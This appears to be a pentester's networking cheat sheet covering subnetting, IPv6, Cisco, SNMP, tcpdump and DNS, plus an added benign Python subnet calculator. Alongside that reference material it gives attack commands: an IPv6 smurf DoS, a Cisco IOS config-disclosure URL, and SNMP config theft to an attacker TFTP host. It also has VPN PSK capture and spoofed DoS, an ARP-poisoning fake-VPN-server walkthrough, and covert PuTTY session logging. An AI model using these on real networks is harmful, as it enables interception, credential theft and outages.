IPv4
CLASSFUL IP RANGES
| A | 0.0.0.0 - 127.255.255.255 |
| B | 128.0.0.0 - 191.255.255.255 |
| C | 192.0.0.0 - 223.255.255.255 |
| D | 224.0.0.0 - 239.255.255.255 |
| E | 240.0.0.0 - 255.255.255.255 |
RESERVED RANGES
10.0.0.0 - 10.255.255.255
127.0.0.0 - 127.255.255.255
172.16.0.0 - 172.31.255.255
192.168.0.0 - 192.168.255.255
SUBNETTING
| /31 | 255.255.255.254 | 1 Host |
| /30 | 255.255.255.252 | 2 Hosts |
| /29 | 255.255.255.248 | 6 Hosts |
| /28 | 255.255.255.240 | 14 Hosts |
| /27 | 255.255.255.224 | 30 Hosts |
| /26 | 255.255.255.192 | 62 Hosts |
| /25 | 255.255.255.128 | 126 Hosts |
| /24 | 255.255.255.0 | 254 Hosts |
| /23 | 255.255.254.0 | 510 Hosts |
| /22 | 255.255.252.0 | 1,022 Hosts |
| /21 | 255.255.248.0 | 2,046 Hosts |
| /20 | 255.255.240.0 | 4,094 Hosts |
| /19 | 255.255.224.0 | 8,190 Hosts |
| /18 | 255.255.192.0 | 16,382 Hosts |
| /17 | 255.255.128.0 | 32,766 Hosts |
| /16 | 255.255.0.0 | 65,534 Hosts |
| /15 | 255.254.0.0 | 131,070 Hosts |
| /14 | 255.252.0.0 | 262,142 Hosts |
| /13 | 255.248.0.0 | 524,286 Hosts |
| /12 | 255.240.0.0 | 1,048,574 Hosts |
| /11 | 255.224.0.0 | 2,097,150 Hosts |
| /10 | 255.192.0.0 | 4,194,302 Hosts |
| /9 | 255.128.0.0 | 8,388,606 Hosts |
| /8 | 255.0.0.0 | 16,777,214 Hosts |
CALCULATING SUBNET RANGE
Given: 1.1.1.101/28
✓ /28 = 255.255.255.240 netmask
✓ 256 - 240 = 16 = subnet ranges of 16, i.e.
1.1.1.0
1.1.1.16
1.1.1.32...
✓ Range where the given host .101 falls: 1.1.1.96 - 1.1.1.111
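Added example, not from the original cheat sheet: the subnet arithmetic above in Python, done the way the page does it (netmask from the prefix, block size = 256 - mask octet, round the host octet down to its block) and cross-checked against the standard library; it also regenerates the /30 to /8 rows of the SUBNETTING table.

```python
import ipaddress


def netmask(prefix: int) -> str:
    """Dotted-quad netmask for /prefix, e.g. /28 -> 255.255.255.240."""
    if not 0 <= prefix <= 32:
        raise ValueError("prefix must be 0..32")
    bits = (0xFFFFFFFF << (32 - prefix)) & 0xFFFFFFFF
    return ".".join(str((bits >> s) & 0xFF) for s in (24, 16, 8, 0))


def usable_hosts(prefix: int) -> int:
    """Usable hosts per subnet as in the table: 2^(32-prefix) minus the
    network and broadcast addresses. Only meaningful up to /30; a /31
    (RFC 3021 point-to-point) and a /32 reserve neither address."""
    if prefix > 30:
        raise ValueError("/31 and /32 have no network/broadcast to subtract")
    return 2 ** (32 - prefix) - 2


def subnet_range(cidr: str) -> tuple:
    """(netmask, first address, last address) of the block a host falls in,
    computed octet by octet with the page's 256 - mask method."""
    host, prefix = cidr.rsplit("/", 1)
    prefix = int(prefix)
    mask_octets = map(int, netmask(prefix).split("."))
    first, last = [], []
    for h, m in zip(map(int, host.split(".")), mask_octets):
        block = 256 - m             # /28: 256 - 240 = 16 (mask 255 -> 1, mask 0 -> 256)
        start = h - (h % block)     # 101 rounds down to 96
        first.append(start)
        last.append(start + block - 1)  # 96 + 16 - 1 = 111
    first_s = ".".join(map(str, first))
    last_s = ".".join(map(str, last))
    # Cross-check the hand method against the standard library.
    net = ipaddress.ip_network(cidr, strict=False)
    assert (first_s, last_s) == (str(net.network_address), str(net.broadcast_address))
    return netmask(prefix), first_s, last_s


def subnet_table() -> list:
    """Rows of the SUBNETTING table above, /30 down to /8."""
    return [(f"/{p}", netmask(p), usable_hosts(p)) for p in range(30, 7, -1)]


if __name__ == "__main__":
    print(subnet_range("1.1.1.101/28"))  # ('255.255.255.240', '1.1.1.96', '1.1.1.111')
    for row in subnet_table():
        print("| {} | {} | {:,} Hosts |".format(*row))
```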
IPv6
BROADCAST ADDRESSES
ff02::1 - link-local nodes
ff05::1 - site-local nodes
ff01::2 - node-local routers
ff02::2 - link-local routers
ff05::2 - site-local routers
INTERFACE ADDRESSES
fe80:: - link-local
2001:: - routable
::a.b.c.d - IPv4 compatible IPv6
::ffff:a.b.c.d - IPv4 mapped IPv6
THC IPv6 TOOLKIT
Remote Network DoS:
> rsmurf6 eth# <remote ipv6>
SOCAT TUNNEL IPv6 THROUGH IPv4 TOOLS
> socat TCP-LISTEN:8080,reuseaddr,fork TCP6:[2001::]:80
> ./nikto.pl -host 127.0.0.1 -port 8080
Cisco Commands
| >enable | Enter privilege mode |
| #configure terminal | Configure interface |
| (config)#interface fa0/0 | Configure FastEthernet 0/0 |
| (config-if)#ip addr 1.1.1.1 255.255.255.0 | Add IP to fa0/0 |
| (config)#line vty 0 4 | Configure vty line |
| (config-line)#login | 1. Set telnet password |
| (config-line)#password <password> | 2. Set telnet password |
| #show session | Open sessions |
| #show version | IOS version |
| #dir file systems | Available files |
| #dir all-filesystems | File information |
| #dir /all | Deleted files |
| #show running-config | Config loaded in mem |
| #show startup-config | Config loaded at boot |
| #show ip interface brief | Interfaces |
| #show interface e0 | Detailed interface info |
| #show ip route | Routes |
| #show access-lists | Access lists |
| #terminal length 0 | No limit on output |
| #copy running-config startup-config | Replace run w/ start config |
| #copy running-config tftp | Copy run config to TFTP Svr |
Cisco IOS 11.2-12.2 VULNERABILITY
http://<ip>/level/<16-99>/exec/show/config
SNMP
MUST START TFTP SERVER 1ST
./snmpblow.pl -s <srcip> -d <rtr_ip> -t <attackerip> -f out.txt < snmpstrings.txt
WINDOWS RUNNING SERVICES:
> snmpwalk -c public -v1 <ip> 1 |grep hrSWRunName |cut -d" " -f4
WINDOWS OPEN TCP PORTS :
> snmpwalk ... |grep tcpConnState |cut -d" " -f6 |sort -u
WINDOWS INSTALLED SOFTWARE :
> snmpwalk ... |grep hrSWInstalledName
WINDOWS USERS :
> snmpwalk ... <ip> 1.3 |grep 77.1.2.25 |cut -d" " -f4
Packet Capturing
CAPTURE TCP TRAFFIC ON PORT 22-23
> tcpdump -nvvX -s0 -i eth0 tcp portrange 22-23
CAPTURE TRAFFIC TO SPECIFIC IP EXCLUDING SPECIFIC SUBNET
> tcpdump -i eth0 -tttt dst <ip> and not net 1.1.1.0/24
CAPTURE TRAFFIC B/W LOCAL-192.1
> tcpdump net 192.1.1
CAPTURE TRAFFIC FOR <SEC> SECONDS
> dumpcap -i eth0 -a duration:<sec> -w <file.pcap>
REPLAY PCAP
> file2cable eth0 -f file.pcap
REPLAY PACKETS (FUZZ / DOS)
> tcpreplay --topspeed --loop=0 --intf=eth0 <.pcap_file_to_replay> --mbps=10|100|1000
DNS
DNSRECON
Reverse lookup for IP range:
./dnsrecon.rb -t rvs -i 192.1.1.1,192.1.1.20
Retrieve standard DNS records:
./dnsrecon.rb -t std -d domain.com
Enumerate subdomains:
./dnsrecon.rb -t brt -d domain.com -w hosts.txt
DNS zone transfer:
./dnsrecon.rb -d domain.com -t axfr
NMAP REVERSE DNS LOOKUP AND OUTPUT PARSER
nmap -R -sL -Pn --dns-servers <dns svr ip> <range> | awk '{if(($1" "$2" "$3)=="Nmap scan report")print$5" "$6}' | sed 's/(//g' | sed 's/)//g' > dns.txt
VPN
WRITE PSK TO FILE
> ike-scan -M -A <vpn ip> -P<file>
DoS VPN SERVER
> ike-scan -A -t 1 --sourceip=<spoof_ip> <dst_ip>
FIKED - FAKE VPN SERVER
✓ Must know the VPN group name and pre-shared key
1. Ettercap filter to drop IPSEC traffic (UDP port 500)
if(ip.proto == UDP && udp.src == 500){
  kill();
  drop();
  msg("*****UDP packet dropped*****");
}
2. Compile filter
> etterfilter udpdrop.filter -o udpdrop.ef
3. Start Ettercap and drop all IPSEC traffic
#ettercap -T -q -M arp -F udpdrop.ef // //
4. Enable IP Forward
> echo "1" > /proc/sys/net/ipv4/ip_forward
5. Configure IPtables to port forward to Fiked server
> iptables -t nat -A PREROUTING -p udp -i eth0 -d <VPN Server IP> -j DNAT --to <Attacking Host IP>
> iptables -P FORWARD ACCEPT
6. Start Fiked to impersonate the VPN Server
> fiked -g <vpn gateway ip> -k <VPN Group Name:Group Pre-Shared Key>
7. Stop Ettercap
8. Restart Ettercap without the filter
> ettercap -T -M arp // //
Putty
REG KEY TO HAVE PUTTY LOG EVERYTHING (INCLUDING CONVERSATIONS)
[HKEY_CURRENT_USER\Software\SimonTatham\Putty\Sessions\Default%20Settings]
"LogFileName"="%TEMP%\\putty.dat"
"LogType"=dword:00000002